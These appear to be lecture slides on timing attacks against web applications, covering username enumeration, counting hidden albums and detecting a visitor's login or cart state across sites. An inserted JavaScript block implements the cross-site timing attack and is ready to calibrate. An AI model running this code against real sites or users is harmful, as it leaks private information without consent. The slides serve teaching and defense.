Exposing Private Information by Timing Web Applications


Exposing Private Information by Timing Web Applications Stephen Kleinheider

Agenda
- Introduction to Timing Attacks
- Direct Timing Attacks
  - Dealing with Network Noise/Jitter
  - Username Enumeration
  - Counting Number of Private Albums in a Gallery
- Cross-Site Timing Attacks
  - Techniques and Issues
  - Test if User is Logged in
  - Counting Number of Items in User's Shopping Cart

Introduction to Timing Attacks
- Timing attacks on web applications measure how long the server takes to answer a request, or how long the browser takes to load a given page
  - By making many requests and comparing response times, an attacker can infer private information
- Prevention is possible, but web developers often ignore it
- Two main types:
  - Direct Timing Attacks
  - Cross-Site Timing Attacks

Direct Timing Attacks
- Measure the time the web site takes to respond to HTTP requests
- A custom client program collects very accurate timing data (sub-millisecond)
- Problem: dealing with network noise/jitter
- Example 1: Testing for Boolean Values: Username Enumeration
- Example 2: Estimating the Size of Hidden Data: Counting Number of Private Albums in a Gallery

Dealing with Network Noise/Jitter
- Varying network conditions: long delays, packet loss
- Server load: the server is handling a great number of requests concurrently
- Solution:
  - Statistical analysis of the collected samples to estimate the jitter
  - Compute the real timing data with that jitter estimate taken into account

Username Enumeration
- Useful for phishing attacks, especially when usernames are e-mail addresses
- Direct timing attacks can be used for username enumeration
[Figure: response times for a non-existent ("Bad") username versus an existing ("Good") one]

Estimating the Size of Hidden Data
- Timing attacks can be used to measure data sets hidden from certain users
- How it works:
  - When displaying a data set, many web applications loop over all records before returning only the ones the viewer is allowed to see
  - The response time therefore correlates strongly with the total number of items, hidden ones included
- Example: Photo Gallery Blog
  - Some albums have per-person permissions
  - "Private" albums are visible only to their creator
  - Develop a timing attack to count the number of "private" albums in a gallery

Counting Number of Hidden Albums
- Much more susceptible to noise
- Very small difference in response time
- Requires an unusually fast network path to the target

Cross-Site Timing Attacks
- Timing attacks that let a malicious site learn information about the user's view of another site
  - The cross-site request can still be timed even when the target has CSRF countermeasures in place
  - Can also be used to test whether other CSRF attacks worked
- Harder to use than direct timing attacks
- Example 1: Testing for Boolean Values: Test if User is Logged in
- Example 2: Estimating the Size of Hidden Data: Counting Number of Items in User's Shopping Cart

Cross-Site Timing Techniques
- JavaScript: a script is allowed to learn when and whether embedded content loads
- Images are an effective method for timing
  - An IMG tag can be used to time any web-accessible URL
- Technique: use an invisible image plus JavaScript to take several timing samples
  - Responses are timed via the onerror handler (an HTML page is not a valid image, so onerror fires once the response has arrived)

Issues with Cross-Site Timing Attacks
- No stable, known network configuration
  - The user could be on any type of connection at almost any geographical location
  - Absolute timing comparisons are not useful
- Solution: two sources
  - A test page whose computation time depends on the hidden data
  - A reference (baseline) page with as little dependency on the hidden data as possible

Determining if a User is Logged in
- Two sources:
  - Test page: front page of the website
  - Reference page: "Contact Us" page
- Able to distinguish between four types of users:
  - Never been to the site
  - Been to the site but never logged in
  - Currently logged into the site
  - Logged in sometime in the past, but not currently logged in
- Users who are logged in get redirected, which adds to the request time
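The cross-site technique, the two-source baseline trick and the logged-in test above, plus the count estimate used later for the shopping cart, as an added browser-side example that is not the speaker's code. The target URLs, the 1.5 threshold ratio and the per-item cost are assumptions that an attacker would calibrate against their own account on the target; the timing part needs a browser (`Image`, `performance.now()`), while the decision functions are plain arithmetic and run anywhere.

```javascript
// Time one cross-origin URL by loading it as an image. The target is an HTML
// page, so decoding fails and onerror fires, but only after the response has
// been received, which is exactly the duration we want. The browser attaches
// the victim's cookies, so the server does its per-user work (session lookup,
// redirect for logged-in users, cart rendering).
function timeAsImage(url) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = performance.now();
    const done = () => resolve(performance.now() - start);
    img.onload = done;
    img.onerror = done;
    // Cache-buster so every sample is a fresh request to the server.
    img.src = url + (url.includes('?') ? '&' : '?') + 'cb=' + Math.random();
  });
}

// Interleave baseline and test samples so both see the same network
// conditions; absolute times are useless on an unknown client connection.
async function collectSamples(testUrl, baselineUrl, n) {
  const test = [];
  const baseline = [];
  for (let i = 0; i < n; i++) {
    baseline.push(await timeAsImage(baselineUrl));
    test.push(await timeAsImage(testUrl));
  }
  return { test, baseline };
}

// Median: robust against the occasional slow sample caused by jitter.
function median(samples) {
  const s = [...samples].sort((a, b) => a - b);
  const mid = s.length >> 1;
  return s.length % 2 === 1 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Boolean test (logged in or not): compare medians as a ratio, which cancels
// the victim's unknown network path. thresholdRatio is an assumption to be
// calibrated against a test account on the target.
function classify(testSamples, baselineSamples, thresholdRatio = 1.5) {
  const ratio = median(testSamples) / median(baselineSamples);
  return { ratio, loggedIn: ratio >= thresholdRatio };
}

// Count estimate (items in a cart): assumes the test page's time grows by
// roughly perItemMs per hidden item above the baseline page.
function estimateCount(testSamples, baselineSamples, perItemMs) {
  const extra = median(testSamples) - median(baselineSamples);
  return Math.max(0, Math.round(extra / perItemMs));
}

// Browser entry point with hypothetical target URLs; skipped outside a browser.
async function run() {
  const { test, baseline } = await collectSamples(
    'https://target.example/',        // front page: redirects logged-in users
    'https://target.example/contact', // "Contact Us": little per-user work
    20);
  console.log(classify(test, baseline));
}
if (typeof Image !== 'undefined') run();
```

The same `classify` call distinguishes the slide's four user types once you also compare against the times of a cold (never visited, no cached assets) load, and `estimateCount` needs the per-item slope measured in advance by adding known numbers of items to a cart you control.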

Estimating Size of Hidden Data
- A tremendous amount of "countable" data is visible only to the user:
  - Number of transactions on a banking site
  - Auctions at an auction site
  - E-mails at a popular webmail site
  - Search results
- Example: Counting Number of Items in User's Shopping Cart

Summary
- Timing attacks on web applications can expose private information
- Useful for information gathering and as a first step of a phishing attack
- Both types of timing attacks need to account for network noise/jitter
- Best defense: ensure the web server always takes a constant amount of time to process a request, regardless of the hidden data